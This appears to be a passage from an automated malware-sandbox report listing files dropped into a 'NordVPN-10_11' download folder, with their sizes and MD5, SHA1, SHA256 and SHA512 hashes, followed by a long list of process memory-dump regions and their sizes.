56edf45b83e69e04714865fffe7f8dafa87a71e900344049ad8533c4b71a844ee3e51790750a1c4d73702fcf00a17fd44d11f6eae6b6dfcd67c49b3b515aeaa9

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\QCL4gEKNdU1S
Filesize
122KB

MD5
fcee1f14b6562ab24043771ac999f806

SHA1
7125492798f3406487ce92d8ff8950d88f28df4f

SHA256
888833093ce9e18582058d3b42934b6754e78bbe5d8ffdb9495a5e821a489bb4

SHA512
fd9aed4ccc693145ea93a5460f8fbcdd65b08a2104860ba8001c249b7378c3feae8624a9e1ab82cfd71064cec83f963c8433feb3fa1d3a4245093ac7b1382bbb

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\R9ZPoAQYj89y
Filesize
110KB

MD5
10c4e5d338db97ab7b4a3bc0ca2672a8

SHA1
cbe2dc263ee124f456b2205c98d7170c92539aac

SHA256
7a03c78f8fc9a3028b7dc9df310899167a746436269e4a57c5c7169bc92298cb

SHA512
063706278090f37b1763f5b3845f666aa0cf190004ad19d4e8ae22b4a08c076f46b26dd4cababe09cd77a4fa970092ee4c067ca2cf1e20455dc29f76af9cd295

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\RNUU6CGBfA6w
Filesize
132KB

MD5
547cb043292307f7407470346e1ae2d1

SHA1
83b09087aacdfc486481ecaf3124a5c0d64f1481

SHA256
adf0004ea7a42c9724170f0c321b91a6a1bccdc0f06ae49bb6bbb8c8d54246ff

SHA512
e3cf902b9158a8ecb7e208a53a27d9bfe1e2424497922e29eac8849001376ad23dfa7457dc4d6d761cdb2f644570431e0bc4573c6239910486548627883463fb

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\n7j7W2HpDlaV
Filesize
76KB

MD5
d256df0128142c2786f16867b624c3ae

SHA1
2abfaa61c522cfd683897ffd4188163454eecd96

SHA256
1fdb08358bf31fcfcd7abe16ff3dc62f44f46a5a0f76daca3254700c777ca87f

SHA512
12bdf93b02d8566b10d77b2b5c4134d74ce8df7eb2bf270c9f8cc138122f928ff05df03da8060820391ad5014f643ae3b3d71e819bbfd44a561b55edfcfc9500

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\o9pCvu9gJvgd
Filesize
110KB

MD5
8e1766890ebee89d299d77795481045e

SHA1
dfdbe4314b015934f06cd79ae28a23533c52f5ef

SHA256
1b66f36687244cf205ec6b578a1d6271a973e68691b4deaa0304710f8c2993d8

SHA512
a39dc28048f8e6216a7cbdc10ce9a058c7657b4a72967956a5535573b9438172dde55084c96519fcda2f3bbe24389b755cc9f141eefd983ab2b0bb375ed6369f

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\p0MXLhfTaaTv
Filesize
150KB

MD5
c2008f9e264dff5507f28d98a7c39adb

SHA1
ea0e0832cc5d674fd865a172bd7efb059cee01a5

SHA256
c71db89c455ac2fa22f5bd633fbf626e3408a1f971d5d995297f4b000185541e

SHA512
daeace12ae8ae14db376a172888dd80b869bea80156916d0d445794ffe36df90e802de2fae7d5d5909dbfff30bea36c12f71ef5e79a4074262f76e43c649435e

Download Submit
C:\Users\Admin\Downloads\NordVPN-10_11\data\appInfo\panO8aCTk5I7
Filesize
110KB

MD5
616c497096de4050a299319be120f5bc

SHA1
2a0cbda932a6c0538250164f901071e522cd7653

SHA256
2877aff346a38b1afd76787b1ecd6599ed240476b543e76af19b918a2c8a0c22

SHA512
6d4066a41c39a1f99d169ab87eeca14119897c0d65bb10d1463ee8686cc5fce56511f1e363598aa84b0c9a4378cc31907941eaa9859d9886cd2364928e64b917

Download Submit
memory/1160-7149-0x00007FF648450000-0x00007FF64930F000-memory.dmp

Filesize
14.7MB

Download
memory/1160-7040-0x00007FFF0CF40000-0x00007FFF0CF42000-memory.dmp

Filesize
8KB

Download
memory/1160-6963-0x00007FFF0CF30000-0x00007FFF0CF32000-memory.dmp

Filesize
8KB

Download
memory/1160-6895-0x00007FF648450000-0x00007FF64930F000-memory.dmp

Filesize
14.7MB

Download
memory/1672-8520-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/1800-4468-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/2392-4395-0x0000000005060000-0x0000000005688000-memory.dmp

Filesize
6.2MB

Download
memory/2392-4413-0x00000000064B0000-0x00000000064CA000-memory.dmp

Filesize
104KB

Download
memory/2392-4408-0x00000000058E0000-0x0000000005C34000-memory.dmp

Filesize
3.3MB

Download
memory/2392-4397-0x0000000005800000-0x0000000005866000-memory.dmp

Filesize
408KB

Download
memory/2392-4394-0x0000000004910000-0x0000000004946000-memory.dmp

Filesize
216KB

Download
memory/2392-4464-0x0000000004A20000-0x0000000004A30000-memory.dmp

Filesize
64KB

Download
memory/2392-4398-0x0000000005870000-0x00000000058D6000-memory.dmp

Filesize
408KB

Download
memory/2392-4472-0x0000000004A20000-0x0000000004A30000-memory.dmp

Filesize
64KB

Download
memory/2392-4393-0x0000000004A20000-0x0000000004A30000-memory.dmp

Filesize
64KB

Download
memory/2392-4392-0x00000000737A0000-0x0000000073F50000-memory.dmp

Filesize
7.7MB

Download
memory/2392-4435-0x00000000737A0000-0x0000000073F50000-memory.dmp

Filesize
7.7MB

Download
memory/2392-4409-0x0000000005F80000-0x0000000005F9E000-memory.dmp

Filesize
120KB

Download
memory/2392-4410-0x0000000005FC0000-0x000000000600C000-memory.dmp

Filesize
304KB

Download
memory/2392-4411-0x0000000004A20000-0x0000000004A30000-memory.dmp

Filesize
64KB

Download
memory/2392-4412-0x0000000006F60000-0x0000000006FF6000-memory.dmp

Filesize
600KB

Download
memory/2392-4396-0x0000000005030000-0x0000000005052000-memory.dmp

Filesize
136KB

Download
memory/2392-4414-0x0000000006500000-0x0000000006522000-memory.dmp

Filesize
136KB

Download
memory/2392-4415-0x0000000007600000-0x0000000007BA4000-memory.dmp

Filesize
5.6MB

Download
memory/3700-4490-0x00007FFF0CD30000-0x00007FFF0CF25000-memory.dmp

Filesize
2.0MB

Download
memory/3700-4493-0x00000000774A0000-0x00000000776B5000-memory.dmp

Filesize
2.1MB

Download
memory/3700-4491-0x0000000003400000-0x0000000003800000-memory.dmp

Filesize
4.0MB

Download
memory/3700-4489-0x0000000003400000-0x0000000003800000-memory.dmp

Filesize
4.0MB

Download
memory/3700-4488-0x0000000003400000-0x0000000003800000-memory.dmp

Filesize
4.0MB

Download
memory/3700-4487-0x0000000003400000-0x0000000003800000-memory.dmp

Filesize
4.0MB

Download
memory/3700-4486-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/3700-4502-0x0000000000400000-0x000000000056A000-memory.dmp

Filesize
1.4MB

Download
memory/3700-4503-0x00000000021D0000-0x000000000222A000-memory.dmp

Filesize
360KB

Download
memory/3700-4504-0x0000000003400000-0x0000000003800000-memory.dmp

Filesize
4.0MB

Download
memory/3700-4485-0x00000000021D0000-0x000000000222A000-memory.dmp

Filesize
360KB

Download
memory/3700-4484-0x0000000000820000-0x0000000000920000-memory.dmp

Filesize
1024KB

Download
memory/4808-4455-0x0000000007D20000-0x0000000007D28000-memory.dmp

Filesize
32KB

Download
memory/4808-4458-0x00000000737A0000-0x0000000073F50000-memory.dmp

Filesize
7.7MB

Download
memory/4808-4420-0x00000000737A0000-0x0000000073F50000-memory.dmp

Filesize
7.7MB

Download
memory/4808-4421-0x0000000002F60000-0x0000000002F70000-memory.dmp

Filesize
64KB

Download
memory/4808-4422-0x0000000002F60000-0x0000000002F70000-memory.dmp

Filesize
64KB

Download
memory/4808-4434-0x0000000002F60000-0x0000000002F70000-memory.dmp

Filesize
64KB

Download
memory/4808-4437-0x00000000700E0000-0x000000007012C000-memory.dmp

Filesize
304KB

Download
memory/4808-4451-0x0000000007CA0000-0x0000000007CB1000-memory.dmp

Filesize
68KB

Download
memory/4808-4436-0x0000000007940000-0x0000000007972000-memory.dmp

Filesize
200KB

Download
memory/4808-4450-0x0000000007B20000-0x0000000007B2A000-memory.dmp

Filesize
40KB

Download
memory/4808-4454-0x0000000007D30000-0x0000000007D4A000-memory.dmp

Filesize
104KB

Download
memory/4808-4453-0x0000000007CF0000-0x0000000007D04000-memory.dmp

Filesize
80KB

Download
memory/4808-4447-0x0000000006CE0000-0x0000000006CFE000-memory.dmp

Filesize
120KB

Download
memory/4808-4448-0x0000000007980000-0x0000000007A23000-memory.dmp

Filesize
652KB

Download
memory/4808-4449-0x00000000080F0000-0x000000000876A000-memory.dmp

Filesize
6.5MB

Download
memory/4808-4452-0x0000000007CE0000-0x0000000007CEE000-memory.dmp

Filesize
56KB

Download
memory/5192-4508-0x0000000000400000-0x00000000008F2000-memory.dmp

Filesize
4.9MB

Download
memory/5772-4496-0x0000000001E80000-0x0000000002280000-memory.dmp

Filesize
4.0MB

Download
memory/5772-4494-0x0000000000130000-0x0000000000139000-memory.dmp

Filesize
36KB

Download
memory/5772-4497-0x0000000001E80000-0x0000000002280000-memory.dmp

Filesize
4.0MB

Download
memory/5772-4500-0x0000000001E80000-0x0000000002280000-memory.dmp

Filesize
4.0MB

Download
memory/5772-4501-0x00000000774A0000-0x00000000776B5000-memory.dmp

Filesize
2.1MB

Download
memory/5772-4498-0x00007FFF0CD30000-0x00007FFF0CF25000-memory.dmp

Filesize
2.0MB

Download
memory/5772-4505-0x0000000001E80000-0x0000000002280000-memory.dmp

Filesize
4.0MB

Download
memory/5940-8531-0x0000000000400000-0x0000000000562000-memory.dmp

Filesize
1.4MB

Download
memory/5940-8530-0x0000000002240000-0x00000000022AC000-memory.dmp

Filesize
432KB

Download
memory/5940-8529-0x0000000000630000-0x0000000000730000-memory.dmp

Filesize
1024KB

Download
memory/5940-9037-0x0000000000400000-0x0000000000562000-memory.dmp

Filesize
1.4MB

Download